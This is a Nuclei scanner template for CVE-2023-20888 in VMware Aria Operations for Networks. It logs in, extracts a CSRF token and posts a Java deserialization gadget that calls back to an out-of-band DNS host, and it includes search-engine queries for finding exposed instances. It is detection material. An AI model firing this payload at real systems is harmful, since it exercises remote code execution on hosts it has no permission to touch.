-
Notifications
You must be signed in to change notification settings - Fork 3.4k
Expand file tree
/
Copy pathCVE-2023-20888.yaml
More file actions
77 lines (70 loc) · 2.66 KB
/
CVE-2023-20888.yaml
File metadata and controls
77 lines (70 loc) · 2.66 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
id: CVE-2023-20888
info:
name: VMware Aria Operations for Networks - Remote Code Execution
author: iamnoooob,rootxharsh,pdresearch
severity: high
description: |
Aria Operations for Networks contains an authenticated deserialization vulnerability. A malicious actor with network access to VMware Aria Operations for Networks and valid 'member' role credentials may be able to perform a deserialization attack resulting in remote code execution.
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
remediation: |
Apply the latest security patches or updates provided by VMware to mitigate this vulnerability.
reference:
- https://www.vmware.com/security/advisories/VMSA-2023-0012.html
- https://nvd.nist.gov/vuln/detail/CVE-2023-20888
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.8
cve-id: CVE-2023-20888
cwe-id: CWE-502
epss-score: 0.9047
epss-percentile: 0.99577
cpe: cpe:2.3:a:vmware:vrealize_network_insight:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 2
vendor: vmware
product: vrealize_network_insight
shodan-query:
- title:"VMware Aria Operations"
- http.title:"vmware vrealize network insight"
- http.title:"vmware aria operations"
fofa-query:
- title="vmware vrealize network insight"
- title="vmware aria operations"
google-query:
- intitle:"vmware aria operations"
- intitle:"vmware vrealize network insight"
tags: cve2023,cve,vmware,aria,rce,authenticated,oast,vuln
http:
- raw:
- |
POST /api/auth/login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json;charset=UTF-8
X-Vrni-Csrf-Token: null
{"username":"{{username}}","password":"{{password}}","domain":"localdomain"}
- |
POST /api/events/push-notifications HTTP/1.1
Host: {{Hostname}}
X-Vrni-Csrf-Token: {{csrf}}
Content-Type: application/json
{"endOffset": "{{ generate_java_gadget("dns", "http://{{interactsh-url}}", "base64") }} "}
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol
words:
- dns
- type: status
status:
- 500
extractors:
- type: regex
name: csrf
group: 1
regex:
- 'csrfToken":"([a-z0-9A-Z/+=]+)"'
internal: true
part: body
# digest: 4a0a004730450220123c11cedf2b05b65aa5a7bc366af99295d6c9ace15ed45b628acc89f8583cd3022100cfe861e47bd65d47d2e7b824cb892f51b7b20103b4ae6bea7c64dd206caf00b3:922c64590222798bb761d5b6d8e72950